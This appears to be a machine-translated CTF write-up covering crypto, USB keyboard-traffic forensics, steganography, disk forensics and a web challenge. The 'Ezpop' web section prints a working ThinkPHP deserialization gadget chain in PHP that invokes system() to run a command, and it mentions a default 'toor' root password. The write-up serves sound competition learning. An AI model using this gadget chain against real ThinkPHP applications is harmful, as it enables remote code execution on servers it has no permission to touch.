Article directory
Crypto
Sign in to the station
Sign in, send a message first, get the title
The 7 codes corresponding to "Bee Shi arrived safely":
1732 2514 1344 0356 0451 6671 0055Modulo ten algorithm example: 1732 and 6378 get 7000
Example of sending a packet: /send?msg=s
Operation with the codebook modulo 10, we get 2979481690868655519524457577
then send the package
Two-way authentication based on challenge code1
Two-way authentication based on challenge code2
It was the same unexpected game as the last game. It was also a game in Spring and Autumn. Direct grep -r "flag{" /
you can find the flag
Two-way authentication based on challenge code3
Not the same method can produce a fake flag
I thought it was fixed
Half an hour? Another bunch of people
Did you put the web title on crypto this time? (?
root password toor (some virtual machines are this password), and then find flag2.txt in the old location
Misc
ez_usb
There is obvious keyboard traffic, but direct export is wrong. It can also be found here that there are two versions, 2.8.1 and 2.10.1, so guesses need to be exported separately
导出2.8.1:tshark -r ez_usb.pcapng -T fields -e usbhid.data -Y "usb.device_address == 8"> 281.txt
导出2.10.1:tshark -r ez_usb.pcapng -T fields -e usbhid.data -Y "usb.device_address == 10"> 2101.txt
The strange thing is that it doesn't work to directly import usb.src, and even the string format can't export 2.8.1 and 2.10.1, strange
keyboard web script
import os
# os.system("tshark -r test.pcapng -T fields -e usb.capdata > usbdata.txt")
normalKeys = {
"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
shiftKeys = {
"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"","34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
nums = []
keys = open('281.txt')
for line in keys:
if len(line)!=17: #首先过滤掉鼠标等其他设备的USB流量
continue
nums.append(line[0:2]+line[4:6]) #取一、三字节
keys.close()
output = ""
for n in nums:
if n[2:4] == "00" :
continue
if n[2:4] in normalKeys:
if n[0:2]=="02": #表示按下了shift
output += shiftKeys [n[2:4]]
else :
output += normalKeys [n[2:4]]
else:
output += '[unknown]'
print('output :n' + output)
A compressed package (need to delete the c in front of del and the last e), a password 35c535765e50074a
, decompress to get the flag
everlasting_night
A2 channel has a password
According to the rgb0 channel has LSB, but can't solve it, and there is a password, guess it is ichunqiu's favorite cloacked-pixel
Through lsb.py, extract a compressed package.
Secondly, at the end of the png file at the beginning, there is 16 bytes of extra data, which cannot be solved by blasting through XOR, and then try md5 and find that it can be solved (cmd5 can't even solve it)
5 languages
Then the solution is a png, but after zlib, it is all 00 and then some data, and the latter is not like compressed by zlib or Huffman, and then combined with the bmp header just to the data, directly lock the bmp, and use the QQ screenshot to generate a Zhang new bmp map and then replace it, change the bit depth to 24 and then blast the width
Blast out at a width of 352
The blasting script uses ancestral script, a total of more than 400 lines (many can be blasted), only the bmp part is given below
def crackbmp():
bmph=fr[22:26]
print(type(bmph))
print(bmph)
k=int.from_bytes(bmph,'little',signed=True)
print(k)
if k<0:
headdata = bytearray(fr[0:18])
widthdata = bytearray(fr[18:22])
heightdata = bytearray(fr[22:26])
remaindata = bytearray(fr[26::])
# n = 2000
h1 = -h
#h=h&0xffffffff
print (h1)
path=os.getcwd()
tmppath=path+'\\tmpbmpnormal'
print(tmppath)
if os.path.exists(tmppath):
os.chdir(tmppath)
else:
os.mkdir(tmppath)
os.chdir(tmppath)
heightdata=h1.to_bytes(4, 'little',signed=True)
for w in range(1,n):
widthdata=w.to_bytes(4, 'little')
newfile=headdata+widthdata+heightdata+remaindata
fw = open(str(w)+'.bmp','wb')
fw.write(newfile)
fw.close
else:
headdata = bytearray(fr[0:18])
widthdata = bytearray(fr[18:22])
heightdata = bytearray(fr[22:26])
remaindata = bytearray(fr[26::])
# n = 2000
# h = 300
path=os.getcwd()
tmppath=path+'\\tmpbmpreverse'
print(tmppath)
if os.path.exists(tmppath):
os.chdir(tmppath)
else:
os.mkdir(tmppath)
os.chdir(tmppath)
heightdata=h.to_bytes(4, 'little',signed=True)
for w in range(1,n):
widthdata=w.to_bytes(4, 'little')
# print (widthdata)
newfile=headdata+widthdata+heightdata+remaindata
fw = open(str(w)+'.bmp','wb')
fw.write(newfile)
fw.close
Questionnaire
baby disk
The first is a wav, and then you can see a file in the recycle bin when you restore it. After testing, the wav is deepsound
Get the password feedback, and then deepsound to solve
key:e575ac894c385a6f
Okay, next is the file without a name, here is the forensics master during the forensics
Very good, it is an encrypted file. After testing, I found that it is veracrypt, and I got a zip, but it is very strange. I translated the name of the zip and found that it is螺旋
Look at the byte size
very good i appreciate it
Find a python algorithm online
https://blog.csdn.net/GW_wg/article/details/120406192
def function(n):
matrix = [[0] * n for _ in range(n)]
number = 1
left, right, up, down = 0, n - 1, 0, n - 1
while left < right and up < down:
# 从左到右
for i in range(left, right):
matrix[up][i] = number
number += 1
# 从上到下
for i in range(up, down):
matrix[i][right] = number
number += 1
# 从右向左
for i in range(right, left, -1):
matrix[down][i] = number
number += 1
for i in range(down, up, -1):
matrix[i][left] = number
number += 1
left += 1
right -= 1
up += 1
down -= 1
# n 为奇数的时候,正方形中间会有个单独的空格需要单独填充
if n % 2 != 0:
matrix[n // 2][n // 2] = number
return matrix
Very good, then the sequence of the spiral will be output, just call and spell it directly, the completeness is as follows
def function(n):
matrix = [[0] * n for _ in range(n)]
number = 1
left, right, up, down = 0, n - 1, 0, n - 1
while left < right and up < down:
# 从左到右
for i in range(left, right):
matrix[up][i] = number
number += 1
# 从上到下
for i in range(up, down):
matrix[i][right] = number
number += 1
# 从右向左
for i in range(right, left, -1):
matrix[down][i] = number
number += 1
for i in range(down, up, -1):
matrix[i][left] = number
number += 1
left += 1
right -= 1
up += 1
down -= 1
# n 为奇数的时候,正方形中间会有个单独的空格需要单独填充
if n % 2 != 0:
matrix[n // 2][n // 2] = number
return matrix
f = open('spiral.zip','rb').read()
s = function(87)
# print(s)
s = sum(s,[])
#print(s)
f1 = open('fla.zip','wb')
arr = [0]*7569
# print(arr)
for i in range(len(s)):
arr[i] = f[s[i]-1]
#print(arr)
# print(arr)
for i in arr:
print(hex(i)[2:].zfill(2),end='')
Then notepad++ converts hex
Length 49, good, then spiral
Very good, appreciate it ->flag{701fa9fe-63f5-410b-93d4-119f96965be6}
Web
Ezpop
www.zip download source code, there is deserialization in the controller
https://www.freebuf.com/vuls/321546.html
construction chain
<?php
namespace think{
abstract class Model{
private $lazySave = false;
private $data = [];
private $exists = false;
protected $table;
private $withAttr = [];
protected $json = [];
protected $jsonAssoc = false;
function __construct($obj = ''){
$this->lazySave = True;
$this->data = ['whoami' => ['cat /flag.txt']];
$this->exists = True;
$this->table = $obj;
$this->withAttr = ['whoami' => ['system']];
$this->json = ['whoami',['whoami']];
$this->jsonAssoc = True;
}
}
}
namespace think\model{
use think\Model;
class Pivot extends Model{
}
}
namespace{
echo(base64_encode(serialize(new think\model\Pivot(new think\model\Pivot()))));
}
Then cyber solve the base in urlencode, I didn't succeed in urlencode directly here...